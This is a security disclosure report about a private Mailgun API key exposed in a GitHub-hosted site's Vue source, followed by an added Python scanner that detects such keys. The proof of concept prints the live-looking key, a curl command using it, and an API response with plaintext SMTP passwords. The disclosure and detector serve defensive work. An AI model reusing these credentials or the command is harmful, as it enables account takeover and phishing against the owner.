Insufficiently Protected Credentials in hotrodzphotography/hotrodzphotography.github.io

Valid

Reported on

May 3rd 2021


✍️ Description

Private Mailgun API key found in https://github.com/hotrodzphotography/hotrodzphotography.github.io/blob/1e8d0227f3558f3df8140ee0042867fcb1146379/src/views/Contact.vue#L48: 90e27fb32160148dc1cc3890ef601355

🕵️‍♂️ Proof of Concept

curl --user 'api:key-90e27fb32160148dc1cc3890ef601355' "https://api.mailgun.net/v3/domains"

{
    "items": [{
            "created_at": "Tue, 22 Dec 2015 00:05:45 GMT",
            "id": "567893d980326765b14ca4dd",
            "is_disabled": false,
            "name": "michaelrodrigues.com",
            "require_tls": false,
            "skip_verification": false,
            "smtp_login": "postmaster@michaelrodrigues.com",
            "smtp_password": "a0ffc6572973c4bc5295fc2dc0277f6f",
            "spam_action": "disabled",
            "state": "unverified",
            "type": "custom",
            "web_prefix": "email",
            "web_scheme": "http",
            "wildcard": false
        },
        {
            "created_at": "Tue, 22 Dec 2015 00:02:18 GMT",
            "id": "5678930a78fa163bbd416ce0",
            "is_disabled": false,
            "name": "sandbox9fe48d38ba29476a918ece4c8b7700ec.mailgun.org",
            "require_tls": false,
            "skip_verification": false,
            "smtp_login": "postmaster@sandbox9fe48d38ba29476a918ece4c8b7700ec.mailgun.org",
            "smtp_password": "8435aa3e9fa23b2ab918eca94bead67d",
            "spam_action": "disabled",
            "state": "active",
            "type": "sandbox",
            "web_prefix": "email",
            "web_scheme": "http",
            "wildcard": false
        }
    ],
    "total_count": 2
}

💥 Impact

The response exposes each domain's smtp_password, giving direct access to the mailbox and allowing phishing campaigns to be sent from your email.
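As an added defender-side check, not part of this report or of the repository, a small scanner for the pattern reported above: a Mailgun private key (and a direct Mailgun API call) embedded in a front-end source file, suitable for a pre-commit hook or CI step. The file contents, key value and domain below are constructed for the example.

```python
import re

# Constructed sample of a Vue component that embeds a Mailgun private key
# client-side, the way the reported Contact.vue did. The key value and the
# domain are made up for this example, not taken from the report.
SAMPLE_FILES = {
    "src/views/Contact.vue": """<script>
import axios from 'axios'
export default {
  methods: {
    send() {
      return axios.post('https://api.mailgun.net/v3/example.test/messages', this.form, {
        auth: { username: 'api', password: 'key-0123456789abcdef0123456789abcdef' },
      })
    },
  },
}
</script>
""",
    ".env.example": "MAILGUN_API_KEY=key-replace-me\n",
}

# Legacy Mailgun private keys are 'key-' plus 32 hex chars, as in the report.
MAILGUN_KEY_RE = re.compile(r"\bkey-[0-9a-f]{32}\b")
# A direct Mailgun API call from a browser bundle is a finding in itself:
# the browser cannot keep a private key secret, so the call belongs on a server.
MAILGUN_API_RE = re.compile(r"api\.mailgun\.net/v3/")

def scan_file(path, text):
    """Return (path, line_no, kind) for each suspicious line in one file."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        if MAILGUN_API_RE.search(line):
            findings.append((path, no, "client-side-mailgun-call"))
        if MAILGUN_KEY_RE.search(line):
            findings.append((path, no, "mailgun-private-key"))
    return findings

def scan_tree(files):
    """Scan every file; a non-empty result should fail the commit or CI job."""
    return [f for path, text in files.items() for f in scan_file(path, text)]

def redact(line):
    """Mask a matched key so a finding can be logged without re-leaking it."""
    return MAILGUN_KEY_RE.sub(lambda m: m.group(0)[:8] + "...", line)

if __name__ == "__main__":
    for path, no, kind in scan_tree(SAMPLE_FILES):
        print(f"{path}:{no}: {kind}")
    raise SystemExit(1 if scan_tree(SAMPLE_FILES) else 0)
```

The placeholder in `.env.example` is deliberately not matched, so the check flags only real-looking keys and not documented templates.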